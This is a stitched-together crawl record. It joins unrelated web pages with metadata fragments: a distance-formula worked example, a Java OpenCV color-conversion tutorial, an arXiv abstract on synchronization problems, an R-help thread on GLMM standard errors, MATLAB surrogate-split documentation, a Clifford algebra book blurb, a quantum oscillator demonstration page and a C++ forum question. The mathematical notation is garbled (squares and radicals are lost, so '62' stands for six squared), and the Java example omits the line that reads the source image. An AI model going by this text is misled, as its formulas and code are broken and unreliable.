"(5,1) , (11,1)\nUse the distance formula to determine the distance between the two points.\nDistance=(x2-x1)2+(y2-y1)2\nSubstitute the actual values of the points into the distance formula.\n(11-5)2+(1-1)2\nSimplify.\nSubtract 5 from 11.\n62+(1-1)2\nRaise 6 to the power of 2.\n36+(1-1)2\nSubtract 1 from 1.\n36+02\nRaising 0 to any positive power yields 0.\n36+0\nAdd 36 and 0.\n36\nRewrite 36 as 62.\n62\nPull terms out from under the radical, assuming positive real numbers.\n6\n6\nFind the Distance Between Two Points (5,1) , (11,1)\n\n### Solving MATH problems\n\nWe can solve all math problems. Get help on the web or with our math app\n\nScroll to top"
] | [
null,
"https://scribesoftimbuktu.com/wp-content/uploads/ask60.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.7061217,"math_prob":0.9986752,"size":515,"snap":"2022-40-2023-06","text_gpt3_token_len":184,"char_repetition_ratio":0.14285715,"word_repetition_ratio":0.0,"special_character_ratio":0.38640776,"punctuation_ratio":0.13492064,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9971772,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-07T02:25:00Z\",\"WARC-Record-ID\":\"<urn:uuid:7d063fc8-8704-4efd-9238-78bf130de824>\",\"Content-Length\":\"73726\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:690cff58-6d74-4e39-8cd3-25deec5fb7ad>\",\"WARC-Concurrent-To\":\"<urn:uuid:085e53d8-49cd-4d03-af10-f2f13f62fcfb>\",\"WARC-IP-Address\":\"107.167.10.237\",\"WARC-Target-URI\":\"https://scribesoftimbuktu.com/find-the-distance-between-two-points-51-111/\",\"WARC-Payload-Digest\":\"sha1:ENLXYKVOL6HZDG53UNNJZFRUQMVIGZUD\",\"WARC-Block-Digest\":\"sha1:OZLURJGD3KGTFWOB5XOLE7KMCNDS5DUN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337906.7_warc_CC-MAIN-20221007014029-20221007044029-00094.warc.gz\"}"} |
https://www.tutorialspoint.com/how-to-convert-rgb-image-to-hsv-using-java-opencv-library | [
"# How to convert RGB image to HSV using Java OpenCV library?\n\nThe cvtColor() method of the Imgproc class changes/converts the color of the image from one to another. This method accepts three parameters −\n\n• src − A Matrix object representing source.\n\n• dst − A Matrix object representing the destination.\n\n• code − An integer value representing the color of the destination image.\n\nTo convert an RGB image to HSV you need to pass Imgproc.COLOR_RGB2HSV as the third parameter to this method.\n\n## Example\n\nimport org.opencv.core.Core;\nimport org.opencv.core.Mat;\nimport org.opencv.imgcodecs.Imgcodecs;\nimport org.opencv.imgproc.Imgproc;\npublic class RGB2HSV {\npublic static void main(String args[]) throws Exception {\n//Creating the empty destination matrix\nMat dst = new Mat();\n//Converting the image to gray scale\nImgproc.cvtColor(src, dst, Imgproc.COLOR_RGB2HSV);\n//Instantiating the Imagecodecs class\nImgcodecs imageCodecs = new Imgcodecs();\n//Writing the image\nimageCodecs.imwrite(\"D:\\images\\colorTOhsv.jpg\", dst);\nSystem.out.println(\"Image Saved\");\n}\n}\n\n## Input",
null,
"## Output",
null,
""
] | [
null,
"https://www.tutorialspoint.com/assets/questions/media/37103/rgb_image.jpg",
null,
"https://www.tutorialspoint.com/assets/questions/media/37103/rgb_image1.jpg",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.62281567,"math_prob":0.4463114,"size":2753,"snap":"2022-40-2023-06","text_gpt3_token_len":653,"char_repetition_ratio":0.22189887,"word_repetition_ratio":0.19724771,"special_character_ratio":0.22629859,"punctuation_ratio":0.12684989,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9596225,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-04T12:16:48Z\",\"WARC-Record-ID\":\"<urn:uuid:c7bd1252-2d8d-4151-87df-211793c910c3>\",\"Content-Length\":\"43432\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8a3bbe0d-0eeb-4845-b0b7-28bcab8db25e>\",\"WARC-Concurrent-To\":\"<urn:uuid:498000d9-7a60-42a1-a562-466e9742fcc7>\",\"WARC-IP-Address\":\"192.229.210.176\",\"WARC-Target-URI\":\"https://www.tutorialspoint.com/how-to-convert-rgb-image-to-hsv-using-java-opencv-library\",\"WARC-Payload-Digest\":\"sha1:AC7DWXPHUYEN22IXGDGBQAG3CQLSJJYE\",\"WARC-Block-Digest\":\"sha1:A7D5ZCBUMVXTUHG6FDOWISOP7ND455F3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500126.0_warc_CC-MAIN-20230204110651-20230204140651-00224.warc.gz\"}"} |
https://arxiv.org/abs/1610.09051 | [
"math.ST\n\nTitle:The Geometry of Synchronization Problems and Learning Group Actions\n\nAbstract: We develop a geometric framework that characterizes the synchronization problem --- the problem of consistently registering or aligning a collection of objects. The theory we formulate characterizes the cohomological nature of synchronization based on the classical theory of fibre bundles. We first establish the correspondence between synchronization problems in a topological group $G$ over a connected graph $\\Gamma$ and the moduli space of flat principal $G$-bundles over $\\Gamma$, and develop a discrete analogy of the renowned theorem of classifying flat principal bundles with fix base and structural group using the representation variety. In particular, we show that prescribing an edge potential on a graph is equivalent to specifying an equivalence class of flat principal bundles, of which the triviality of holonomy dictates the synchronizability of the edge potential. We then develop a twisted cohomology theory for associated vector bundles of the flat principal bundle arising from an edge potential, which is a discrete version of the twisted cohomology in differential geometry. This theory realizes the obstruction to synchronizability as a cohomology group of the twisted de Rham cochain complex. We then build a discrete twisted Hodge theory --- a fibre bundle analog of the discrete Hodge theory on graphs --- which geometrically realizes the graph connection Laplacian as a Hodge Laplacian of degree zero. Motivated by our geometric framework, we study the problem of learning group actions --- partitioning a collection of objects based on the local synchronizability of pairwise correspondence relations. A dual interpretation is to learn finitely generated subgroups of an ambient transformation group from noisy observed group elements. A synchronization-based algorithm is also provided, and we demonstrate its efficacy using simulations and real data.\n Comments: 43 pages, 6 figures. To appear in Discrete \\& Computational Geometry Subjects: Statistics Theory (math.ST); Computational Geometry (cs.CG) MSC classes: 05C50, 62-07, 57R22, 58A14 ACM classes: I.2.6; F.2.2 Cite as: arXiv:1610.09051 [math.ST] (or arXiv:1610.09051v3 [math.ST] for this version)\n\nSubmission history\n\nFrom: Tingran Gao [view email]\n[v1] Fri, 28 Oct 2016 01:20:52 UTC (3,942 KB)\n[v2] Sun, 7 Apr 2019 03:46:08 UTC (3,657 KB)\n[v3] Tue, 14 May 2019 03:51:35 UTC (4,373 KB)"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.84281653,"math_prob":0.91511595,"size":2374,"snap":"2019-43-2019-47","text_gpt3_token_len":499,"char_repetition_ratio":0.11476793,"word_repetition_ratio":0.0,"special_character_ratio":0.21187869,"punctuation_ratio":0.095,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97228354,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-23T00:32:42Z\",\"WARC-Record-ID\":\"<urn:uuid:348a184a-6975-4e8f-b787-535dbb63b439>\",\"Content-Length\":\"21778\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6e3a6ec5-792f-49c9-b1bc-381ec8137587>\",\"WARC-Concurrent-To\":\"<urn:uuid:8d3e8b25-cabf-4be4-8621-624d1a032e6e>\",\"WARC-IP-Address\":\"128.84.21.199\",\"WARC-Target-URI\":\"https://arxiv.org/abs/1610.09051\",\"WARC-Payload-Digest\":\"sha1:6DPTNYMMLVFJ3O5F6VJJ4DFRTRZQ4SWX\",\"WARC-Block-Digest\":\"sha1:5UTQELXAAPP7PQYIN6NQEYQ7ODZ33EGS\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570987826436.88_warc_CC-MAIN-20191022232751-20191023020251-00251.warc.gz\"}"} |
https://stat.ethz.ch/pipermail/r-help/2018-December/461020.html | [
"# [R] SE for all fixed factor effect in GLMM\n\nHeinz Tuechler tuechler @ending from gmx@@t\nSun Dec 30 08:58:09 CET 2018\n\n```maybe qvcalc https://cran.r-project.org/web/packages/qvcalc/index.html\nis useful for you.\n\nMarc Girondot via R-help wrote/hat geschrieben on/am 30.12.2018 05:31:\n> Dear members,\n>\n> Let do a example of simple GLMM with x and G as fixed factors and R as\n> random factor:\n>\n> (note that question is the same with GLM or even LM):\n>\n> x <- rnorm(100)\n> y <- rnorm(100)\n> G <- as.factor(sample(c(\"A\", \"B\", \"C\", \"D\"), 100, replace = TRUE))\n> R <- as.factor(rep(1:25, 4))\n>\n> library(lme4)\n>\n> m <- lmer(y ~ x + G + (1 | R))\n> summary(m)\\$coefficients\n>\n> I get the fixed effect fit and their SE\n>\n>> summary(m)\\$coefficients\n> Estimate Std. Error t value\n> (Intercept) 0.07264454 0.1952380 0.3720820\n> x -0.02519892 0.1238621 -0.2034433\n> GB 0.10969225 0.3118371 0.3517614\n> GC -0.09771555 0.2705523 -0.3611706\n> GD -0.12944760 0.2740012 -0.4724344\n>\n> The estimate for GA is not shown as it is fixed to 0. Normal, it is the\n> reference level.\n>\n> But is there a way to get SE for GA of is-it non-sense question because\n> GA is fixed to 0 ?\n>\n> ______________\n>\n> I propose here a solution but I don't know if it is correct. It is based\n> on reordering levels and averaging se for all reordering:\n>\n> G <- relevel(G, \"A\")\n> m <- lmer(y ~ x + G + (1 | R))\n> sA <- summary(m)\\$coefficients\n>\n> G <- relevel(G, \"B\")\n> m <- lmer(y ~ x + G + (1 | R))\n> sB <- summary(m)\\$coefficients\n>\n> G <- relevel(G, \"C\")\n> m <- lmer(y ~ x + G + (1 | R))\n> sC <- summary(m)\\$coefficients\n>\n> G <- relevel(G, \"D\")\n> m <- lmer(y ~ x + G + (1 | R))\n> sD <- summary(m)\\$coefficients\n>\n> seA <- mean(sB[\"GA\", \"Std. Error\"], sC[\"GA\", \"Std. Error\"], sD[\"GA\",\n> \"Std. Error\"])\n> seB <- mean(sA[\"GB\", \"Std. Error\"], sC[\"GB\", \"Std. Error\"], sD[\"GB\",\n> \"Std. Error\"])\n> seC <- mean(sA[\"GC\", \"Std. Error\"], sB[\"GC\", \"Std. Error\"], sD[\"GC\",\n> \"Std. Error\"])\n> seD <- mean(sA[\"GD\", \"Std. Error\"], sB[\"GD\", \"Std. Error\"], sC[\"GD\",\n> \"Std. Error\"])\n>\n> seA; seB; seC; seD\n>\n>\n> Thanks,\n>\n> Marc\n>\n> ______________________________________________\n> R-help using r-project.org mailing list -- To UNSUBSCRIBE and more, see\n> https://stat.ethz.ch/mailman/listinfo/r-help"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.61432225,"math_prob":0.849771,"size":2435,"snap":"2021-31-2021-39","text_gpt3_token_len":857,"char_repetition_ratio":0.15261209,"word_repetition_ratio":0.12731482,"special_character_ratio":0.45462012,"punctuation_ratio":0.19029126,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9956723,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-31T23:24:20Z\",\"WARC-Record-ID\":\"<urn:uuid:30c39436-68ae-4fd4-b8ac-9327f3721fe2>\",\"Content-Length\":\"6576\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:991da3f5-553f-46dc-a818-2e49d8407f3b>\",\"WARC-Concurrent-To\":\"<urn:uuid:29d8c76d-118f-4559-8eb9-733ec1f3561a>\",\"WARC-IP-Address\":\"129.132.119.195\",\"WARC-Target-URI\":\"https://stat.ethz.ch/pipermail/r-help/2018-December/461020.html\",\"WARC-Payload-Digest\":\"sha1:7T7ONQ3HRIDOXGNCGL7YSJGDZ5CCZVDW\",\"WARC-Block-Digest\":\"sha1:A2VDAJ7Z5FJ3ELDIJH6LXHXCJ4TDZ7KR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154126.73_warc_CC-MAIN-20210731203400-20210731233400-00512.warc.gz\"}"} |
https://nl.mathworks.com/help/stats/surrogate-splits-for-missing-data.html | [
"Documentation\n\n## Surrogate Splits\n\nWhen the value of the optimal split predictor for an observation is missing, if you specify to use surrogate splits, the software sends the observation to the left or right child node using the best surrogate predictor. When you have missing data, trees and ensembles of trees with surrogate splits give better predictions. This example shows how to improve the accuracy of predictions for data with missing values by using decision trees with surrogate splits.\n\nLoad the `ionosphere` data set.\n\n`load ionosphere`\n\nPartition the data set into training and test sets. Hold out 30% of the data for testing.\n\n```rng('default') % For reproducibility cv = cvpartition(Y,'Holdout',0.3);```\n\nIdentify the training and testing data.\n\n```Xtrain = X(training(cv),:); Ytrain = Y(training(cv)); Xtest = X(test(cv),:); Ytest = Y(test(cv));```\n\nSuppose half of the values in the test set are missing. Set half of the values in the test set to `NaN`.\n\n`Xtest(rand(size(Xtest))>0.5) = NaN;`\n\n### Train Random Forest\n\nTrain a random forest of 150 classification trees without surrogate splits.\n\n```templ = templateTree('Reproducible',true); % For reproducibility of random predictor selections Mdl = fitcensemble(Xtrain,Ytrain,'Method','Bag','NumLearningCycles',150,'Learners',templ);```\n\nCreate a decision tree template that uses surrogate splits. A tree using surrogate splits does not discard the entire observation when it includes missing data in some predictors.\n\n`templS = templateTree('Surrogate','On','Reproducible',true);`\n\nTrain a random forest using the template `templS`.\n\n`Mdls = fitcensemble(Xtrain,Ytrain,'Method','Bag','NumLearningCycles',150,'Learners',templS);`\n\n### Test Accuracy\n\nTest the accuracy of predictions with and without surrogate splits.\n\nPredict responses and create confusion matrix charts using both approaches.\n\n```Ytest_pred = predict(Mdl,Xtest); figure cm = confusionchart(Ytest,Ytest_pred); cm.Title = 'Model Without Surrogates';```",
null,
"```Ytest_preds = predict(Mdls,Xtest); figure cms = confusionchart(Ytest,Ytest_preds); cms.Title = 'Model with Surrogates';```",
null,
"All off-diagonal elements on the confusion matrix represent misclassified data. A good classifier yields a confusion matrix that looks dominantly diagonal. In this case, the classification error is lower for the model trained with surrogate splits.\n\nEstimate cumulative classification errors. Specify `'Mode','Cumulative'` when estimating classification errors by using the `loss` function. The `loss` function returns a vector in which element `J` indicates the error using the first `J` learners.\n\n```figure plot(loss(Mdl,Xtest,Ytest,'Mode','Cumulative')) hold on plot(loss(Mdls,Xtest,Ytest,'Mode','Cumulative'),'r--') legend('Trees without surrogate splits','Trees with surrogate splits') xlabel('Number of trees') ylabel('Test classification error')```",
null,
"The error value decreases as the number of trees increases, which indicates good performance. The classification error is lower for the model trained with surrogate splits.\n\nCheck the statistical significance of the difference in results with by using `compareHoldout`. This function uses the McNemar test.\n\n`[~,p] = compareHoldout(Mdls,Mdl,Xtest,Xtest,Ytest,'Alternative','greater')`\n```p = 0.1051 ```\n\nThe low p-value indicates that the ensemble with surrogate splits is better in a statistically significant manner.\n\n### Estimate Predictor Importance\n\nPredictor importance estimates can vary depending on whether or not a tree uses surrogate splits. After estimating predictor importance, you can exclude unimportant predictors and train a model again. Eliminating unimportant predictors saves time and memory for predictions, and makes predictions easier to understand.\n\nEstimate predictor importance measures by permuting out-of-bag observations. Then, find the five most important predictors.\n\n```imp = oobPermutedPredictorImportance(Mdl); [~,ind] = maxk(imp,5)```\n```ind = 1×5 3 5 27 7 8 ```\n```imps = oobPermutedPredictorImportance(Mdls); [~,inds] = maxk(imps,5)```\n```inds = 1×5 5 3 7 27 8 ```\n\nThe five most important predictors are the same, but the orders of importance are different.\n\nIf the training data includes many predictors and you want to analyze predictor importance, then specify `'NumVariablesToSample'` of the `templateTree` function as `'all'` for the tree learners of the ensemble. Otherwise, the software might not select some predictors, underestimating their importance. For an example, see Select Predictors for Random Forests."
] | [
null,
"https://nl.mathworks.com/help/examples/stats/win64/SurrogateSplitsExample_01.png",
null,
"https://nl.mathworks.com/help/examples/stats/win64/SurrogateSplitsExample_02.png",
null,
"https://nl.mathworks.com/help/examples/stats/win64/SurrogateSplitsExample_03.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.70883286,"math_prob":0.9461111,"size":4334,"snap":"2019-43-2019-47","text_gpt3_token_len":970,"char_repetition_ratio":0.14618938,"word_repetition_ratio":0.038596492,"special_character_ratio":0.21019843,"punctuation_ratio":0.16069058,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9764063,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-20T11:29:04Z\",\"WARC-Record-ID\":\"<urn:uuid:b85ff18e-5211-4269-bb4e-b8111d7d5582>\",\"Content-Length\":\"74177\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9df2a21b-f622-484b-9bf3-ce02119826c6>\",\"WARC-Concurrent-To\":\"<urn:uuid:add2b838-6a3c-4a4e-a7cf-1c743850ff60>\",\"WARC-IP-Address\":\"104.110.193.39\",\"WARC-Target-URI\":\"https://nl.mathworks.com/help/stats/surrogate-splits-for-missing-data.html\",\"WARC-Payload-Digest\":\"sha1:6U7AG5LQMZ5VFBBNGDAJAKKATRN42BSS\",\"WARC-Block-Digest\":\"sha1:GGP32IHBTXUO3RPZURTONVMEI7QL4OCL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670558.91_warc_CC-MAIN-20191120111249-20191120135249-00305.warc.gz\"}"} |
https://ebooksz.net/2021/10/15/introduction-to-clifford-algebra-a-new-perspective/ | [
"Home » Mathematics » Introduction to Clifford Algebra: A New Perspective\n\n# Introduction to Clifford Algebra: A New Perspective",
null,
"English | 2020 | ISBN: 1536185337 | 185 Pages | PDF | 6 MB\n\nThis book pursues to exhibit how we can construct a Clifford type algebra from the classical one. The basic idea of these lecture notes is to show how to calculate fundamental solutions to either firstorder differential operators of the form D=��_(i=0)^n?��e_i _i��or secondorder elliptic differential operators��D D, both with constant coefficients or combinations of this kind of operators. After considering in detail how to find the fundamental solution we study the problem of integral representations in a classical Clifford algebra and in a dependentparameter Clifford algebra whichgeneralizes the classical one. We also propose a basic method to extend the order of the operator, for instance D^n,n��N and how to produce integral representations for higher order operators and mixtures of them. Although the Clifford algebras have produced many applications concerning boundary value problems, initial value problems, mathematical physics, quantum chemistry, among others; in this book we do not discuss these topics as they are better discussed in other courses. Researchers and practitioners will find this book very useful as a source book. The reader is expected to have basic knowledge of partial differential equations and complex analysis. When planning and writing these lecture notes, we had in mind that they would be used as a resource by mathematics students interested in understanding how we can combine partial differential equations and Clifford analysis to find integral representations. This in turn would allow them to solve boundary value problems and initial value problems. To this end, proofs have been described in rigorous detail and we have included numerous worked examples. On the other hand, exercises have not been included."
] | [
null,
"https://ebooksz.net/wp-content/uploads/2021/10/Introduction-to-Clifford-Algebra-A-New-Perspective-200x300.jpg",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.931773,"math_prob":0.8651843,"size":1911,"snap":"2023-14-2023-23","text_gpt3_token_len":366,"char_repetition_ratio":0.10592554,"word_repetition_ratio":0.0,"special_character_ratio":0.18995291,"punctuation_ratio":0.0875,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9825195,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-28T11:44:07Z\",\"WARC-Record-ID\":\"<urn:uuid:e690a242-816a-477c-a626-2e9df1b37db6>\",\"Content-Length\":\"38633\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:65d2ea4b-9bd4-4a75-ad68-7bf849787219>\",\"WARC-Concurrent-To\":\"<urn:uuid:ebf6cd86-59a3-4797-9944-f53a9a2cf6e3>\",\"WARC-IP-Address\":\"104.21.29.120\",\"WARC-Target-URI\":\"https://ebooksz.net/2021/10/15/introduction-to-clifford-algebra-a-new-perspective/\",\"WARC-Payload-Digest\":\"sha1:7CXWYNOMX3NQQW75OS6CLBGNSUSPIGW6\",\"WARC-Block-Digest\":\"sha1:6SR5IKEK5LBT7TMG3PPHSXDPS3ESOWZ4\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296948858.7_warc_CC-MAIN-20230328104523-20230328134523-00172.warc.gz\"}"} |
http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/ | [
"",
null,
"Causal Interpretation of the Quantum Harmonic Oscillator\n\nRequires a Wolfram Notebook System\n\nInteract on desktop, mobile and cloud with the free Wolfram CDF Player or other Wolfram Language products.\n\nRequires a Wolfram Notebook System\n\nEdit on desktop, mobile and cloud with any Wolfram Language product.\n\nThe harmonic oscillator is an important model in quantum theory that could be described by the Schrödinger equation:",
null,
", (",
null,
") with",
null,
". In this Demonstration a causal interpretation of this model is applied. A stable (nondispersive) wave packet can be constructed by a superposition of stationary eigenfunctions of the harmonic oscillator. The solution is a wave packet in the (",
null,
",",
null,
") space where the center of the packet oscillates harmonically between",
null,
"with frequency",
null,
". From the wavefunction in the eikonal representation",
null,
", the gradient of the phase function",
null,
"and therefore the equation for the motion could be calculated analytically. The motion is given by",
null,
", where",
null,
"are the initial starting points. The trajectories of the particles oscillate with the amplitude",
null,
"and frequency",
null,
"and they never cross. In practice, it is impossible to predict or control the quantum trajectories with complete precision. The effective potential is the sum of quantum potential (QP) and potential",
null,
"that leads to the time-dependent quantum force:",
null,
".\n\n[more]\n\nOn the right side, the graphic shows the squared wavefunction and the trajectories. The left side shows the particles' positions, the squared wavefunction (blue), the quantum potential (red), the potential (black), and the velocity (green). The quantum potential and the velocity are scaled down.\n\n[less]\n\nContributed by: Klaus von Bloh (March 2011)\nOpen content licensed under CC BY-NC-SA\n\nSnapshots",
null,
"",
null,
"",
null,
"Details\n\nP. Holland, The Quantum Theory of Motion, Cambridge, England: Cambridge University Press, 1993.\n\nD. Bohm, Quantum Theory, New York: Prentice–Hall, 1951.\n\nPermanent Citation\n\nKlaus von Bloh\n\n Feedback (field required) Email (field required) Name Occupation Organization Note: Your message & contact information may be shared with the author of any specific Demonstration for which you give feedback. Send"
] | [
null,
"http://demonstrations.wolfram.com/app-files/assets/img/header-spikey2x.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc1.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc2.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc3.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc4.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc5.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc6.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc7.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc8.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc9.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc10.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc11.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc12.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc13.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc14.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc15.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/popup_1.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/popup_2.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/popup_3.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8374261,"math_prob":0.9295832,"size":2101,"snap":"2019-26-2019-30","text_gpt3_token_len":449,"char_repetition_ratio":0.13543157,"word_repetition_ratio":0.026666667,"special_character_ratio":0.18990956,"punctuation_ratio":0.13142857,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9864191,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38],"im_url_duplicate_count":[null,null,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-17T11:47:19Z\",\"WARC-Record-ID\":\"<urn:uuid:212692c1-3d4b-4c17-a256-8305154c3951>\",\"Content-Length\":\"35063\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cf572bb2-a91f-44a5-b6bd-7dc4dcad5e3b>\",\"WARC-Concurrent-To\":\"<urn:uuid:79e31bde-e370-4fb5-b76f-31d427fed11a>\",\"WARC-IP-Address\":\"140.177.205.90\",\"WARC-Target-URI\":\"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/\",\"WARC-Payload-Digest\":\"sha1:ESQO5TPCKJGNSRBST66X3U4X6IIPERKB\",\"WARC-Block-Digest\":\"sha1:GFU4QH3DZE3UUCJSGWKAPAHKXPAV7LUZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627998473.44_warc_CC-MAIN-20190617103006-20190617125006-00009.warc.gz\"}"} |
https://www.daniweb.com/programming/threads/504710/question-on-using-map-with-c-strings-in-c | [
"",
null,
"Hi, everyone!\n\nI have to make a function which would get a c-string of an inputted text and it would output the number of times each unique word occurs in it.\n\nOf course, I must use c-strings [yeah yeah, I know but that is what the assignment is].\n\nHere's my code:\n\n``````void analyzeWordOccurrence(char* inputtedText)\n{\n//the function gets a C-String of text inputted from the user\n//it tokenizes the words, and then counts the number of times each\n//word occurs in the inputtedText\nmap<char*,unsigned> wordCounts = map<char*,unsigned>();\n\n//tokenize the words and then add unique values to wordCounts\n//if there is already such a value, increase the corresponding count by 1\nchar* tokenPtr = strtok(inputtedText,\" \"); //begin tokenization of sentence\n\nwhile (tokenPtr != NULL) //i.e. there is a token to analyze\n{\n//extract the word\ncout << \"DEBUG: tokenPtr: \" << tokenPtr << endl;\nchar aToken[strlen(tokenPtr)];\nstrcpy(aToken,tokenPtr);\n\ncout << \"DEBUG: aToken is: \" << aToken << endl;\ncout << \"wordCounts.count(aToken) is: \" << wordCounts.count(aToken) << endl;\nif (wordCounts.count(aToken) == 0) //the token is not in the map\nwordCounts.insert( pair<char*,unsigned>(aToken,1));\nelse\nwordCounts[aToken]+=1; //token is there and increment count\n\ntokenPtr = strtok(NULL,\" \");\n}\n\ncout << \"\\nDEBUG: Done counting. The counts are: \" << endl;\nfor (auto& kv : wordCounts)\n{\ncout << kv.first << \" has value \" << kv.second << endl;\n}\n}\n``````\n\nThe issue is with the line \"wordCounts.count(aToken) == 0.\n\nSomehow it gives an output of 0 for the first word, but for the second word, it thinks that it is equal to the first word that I tokenized and put in map, and thus goes to the \"else\" statment, incrementing it to a 2 from 1.\n\nHere's my console output from debugging:\n\n``````Please <Enter> a giant line of text as input.\nDo not be afraid if your input spans multiple lines on this console as this is OK (as long as the number of characters inputted is less than 500).\n\n<Enter> here: malechi likes to exercise\nDEBUG: tokenPtr: malechi\nDEBUG: aToken is: malechi\nwordCounts.count(aToken) is: 0\nDEBUG: tokenPtr: likes\nDEBUG: aToken is: likes\nwordCounts.count(aToken) is: 1\n``````\n\nAs you can see, my function is not working, but I do not know how to fix it.\n\nWould anyone be kind to offer some advice?\n\nThanks!\n\nOne way would be to replace:\n\n``````if (wordCounts.count(aToken) == 0) //the token is not in the map\nwordCounts.insert( pair<char*,unsigned>(aToken,1));\nelse\nwordCounts[aToken]+=1;\n``````\n\nwith\n\n``````wordCounts[aToken]+=1;\n``````\n\nIf atoken is present, in the map, the value will increment by 1. If, it isn't present it will be added with the default value(0) then incremented.",
null,
"ohh wow. That's nice.\n\nThank you!!"
] | [
null,
"https://static.daniweb.com/connect/images/anonymous.png",
null,
"https://static.daniweb.com/connect/images/anonymous.png",
null
